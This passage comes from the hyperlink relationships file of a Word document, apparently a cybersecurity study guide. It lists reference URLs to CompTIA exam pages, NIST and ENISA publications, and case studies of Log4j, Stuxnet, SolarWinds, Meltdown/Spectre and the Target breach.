Target="https://www.comptia.org/en-us/blog/the-comptia-cybersecurity-career-pathway-employable-skills-found-here/" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/en-us/blog/what-is-on-the-comptia-security-exam/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.edusum.com/comptia/comptia-securityx-cas-005-certification-sample-questions" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scribd.com/document/946312959/Case-Study-on-WannaCry-Ransomware" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scribd.com/document/896304683/11563-CySA-CS0-003-Exam-Objectiv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vlpubs.nist.gov/nistpubs/specialpublications/NIST.SP.800-207.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/publications/european-cybersecurity-skills-framework-ecsf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://terrazone.io/solarwinds-attack/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gao.gov/blog/solarwinds-cyberattack-demands-significant-federal-and-private-sector-response-infographic" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/en-us/cybersecurity-101/exposure-management/log4j-vulnerability/" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibm.com/think/topics/log4j" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://amtivo.com/uk/standards/cyber-essentials/insights/the-biggest-cyberattacks-by-year/" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kusari.dev/learning-center/log4j" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://samsik.dk/wp-content/uploads/2026/01/20211105_CFCS-solarwinds-report-EN.pdf" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.futurelearn.com/info/courses/security-by-design/0/steps/390395" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nsarchive.gwu.edu/sites/default/files/documents/3173339/Document-07.pdf" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/stuxnet" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ccdcoe.org/uploads/2018/10/Falco2012_StuxnetFactsReport.pdf" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/ics-advisories/icsa-10-238-01b" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/alerts/2018/01/04/meltdown-and-spectre-side-channel-vulnerability-guidance" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meltdownattack.com/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncyte.net/academia/faculty/cybersecurity-curriculum/college-curriculum/interactive-lessons/meltdown-and-spectre" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nccgroup.com/research/spectre-and-meltdown-what-you-need-to-know/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/news/enisa-news/stuxnet-analysis" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://intellectualpoint.com/are-you-ready-for-the-casp-cas-004-exam/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.breachsense.com/blog/target-data-breach/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dnv.com/training/iso-31000-risk-management-foundation-course-6961/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jise.org/Volume29/n1/JISEv29n1p11.pdf" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.commerce.senate.gov/wp-content/uploads/media/doc/2014%200325%20Target%20Kill%20Chain%20Analysis.pdf" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://destcert.com/resources/security-plus-701-objectives/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosectrain.com/blog/isc2-issap-domain-1-architect-for-governance-compliance-and-risk-management" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.SP.800-207.pdf" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/publications/zero-trust-architecture" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pmc.ncbi.nlm.nih.gov/articles/PMC10742574/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/zero-trust-architec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